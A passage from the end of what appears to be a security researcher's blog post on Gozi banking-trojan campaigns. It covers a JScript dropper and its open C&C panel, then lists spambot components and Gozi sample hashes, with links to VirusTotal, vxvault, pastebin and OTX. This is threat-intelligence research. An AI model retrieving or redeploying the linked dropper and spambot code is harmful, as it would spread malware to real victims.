<li><a href="https://pastebin.com/CZpFZvMJ">powershell_dll</a> </li>
<li><a href="https://pastebin.com/8YPL2jGX">powershell_exe</a> </li>
</ul>
</br>
This dropper is fully in JScript \o/ </br>
The C&C part is open, it's possible to retrieves some statistics:</br>
<a href="https://i.imgur.com/MJY4Cmv.png"><img src="https://i.imgur.com/MJY4Cmv.png"height="95%" width="95%"></a>
</br>
Big picture of this JSDropper:</br>
<a href="https://i.imgur.com/MJAwHTM.png"><img src=https://i.imgur.com/MJAwHTM.png height="170px"> </a>
</br>I've seen some switch between JSDropper and doc+macro during some times (<a href="https://www.virustotal.com/fr/url/6c8d675e5a2dd055ce54aa0bea80465a128dff5f3da6ddb01ae9a89ed24ff129/analysis/">https://www.virustotal.com/fr/url/6c8d675e5a2dd055ce54aa0bea80465a128dff5f3da6ddb01ae9a89ed24ff129/analysis/)</a>
</br>
It's look like Gozi campaigns are not a so big deal...</br>
<iframe src="//giphy.com/embed/UbywW6H8EbYty" width="480" height="270" frameBorder="0" class="giphy-embed" allowFullScreen></iframe>
</br></br>
<h2>Annexes</h2>
<h3>Spambot</h3>
<ul>
<li>
spambot.exe - <a href="http://vxvault.net/ViriFiche.php?ID=32824">b5c87cab2ff99d1e4b4c3ee897b07869fa8f6a63fbd27018f589c105faf91fcd</a>
</li>
<li>
CheckerSMTPv5.dll - 1cae16cb11c32aaa0cb190189d88811288e06df7cccda6473409de3ea5c7b633
</li>
<li>
MailerSMTPv6.dll - 026df17589f9854a34a49ac097c5f8e3b99473c61e853be18050d458ae20113b
</li>
<li>
Full list of r4.php - <a href="https://pastebin.com/fht6G6pe">https://pastebin.com/fht6G6pe</a>
</li>
<li>
r4.php - <a href="https://pastebin.com/fxLvrM06">https://pastebin.com/fxLvrM06</a>
</li>
</ul>
<h3>Gozi samples</h3>
<ul>
<li><a href="https://www.virustotal.com/fr/file/6b15aa3f3d6bb1c308974fc87bd38ceb2ee337fd3495ebe6c6e7157a85e914cb/analysis/1482592608/">6b15aa3f3d6bb1c308974fc87bd38ceb2ee337fd3495ebe6c6e7157a85e914cb</a></li>
<li><a href="https://www.virustotal.com/fr/file/14b05f0bd0ca6e169a8d4be542a4165c4266a0419c1d0d857b98b4d84619bdf7/analysis/1469938855/">14b05f0bd0ca6e169a8d4be542a4165c4266a0419c1d0d857b98b4d84619bdf7</a></li>
<li><a href="https://www.virustotal.com/fr/file/4f3f957334bcbde8462f9215fd20d6fd6363c449e07bbf49f30428399c9f6e57/analysis/1482848442/">4f3f957334bcbde8462f9215fd20d6fd6363c449e07bbf49f30428399c9f6e57</a></li>
<li><a href="https://www.virustotal.com/fr/file/9f298cee96c9de4ff85524f99fc34db3a11726ddd8c4fcdf8e2d79ef13437057/analysis/1475825451/">9f298cee96c9de4ff85524f99fc34db3a11726ddd8c4fcdf8e2d79ef13437057</a></li>
<li><a href="https://www.virustotal.com/fr/file/fd11e035295639b19dfe418514c91159b3f50ea8dc350c36b63a9363e52f4533/analysis/1480163765/">fd11e035295639b19dfe418514c91159b3f50ea8dc350c36b63a9363e52f4533</a></li>
<li><a href="https://www.virustotal.com/fr/file/d843403b871a353020bffdedd9c4905e34ed195c1222c3bfd3567c97eb4f69a4/analysis/1483919220/">d843403b871a353020bffdedd9c4905e34ed195c1222c3bfd3567c97eb4f69a4</a></li>
<li><a href="http://vxvault.net/ViriFiche.php?ID=33038">a194d0ef0d27bd07ec22bb4ebc739847c589b4307603b6d65cf1f3fbdd19f6cd</a></li>
<li><a href="http://vxvault.net/ViriFiche.php?ID=33033">d4b2377c5f9af91cc693fce967f3049ab4c6ec75c162276b584002946203a770</a></li>
</ul>
OTX - <a href="https://otx.alienvault.com/pulse/5851b5d287d2d95d361dd743" />https://otx.alienvault.com/pulse/5851b5d287d2d95d361dd743/</a>Benkow_http://www.blogger.com/profile/00709869309686004611noreply@blogger.com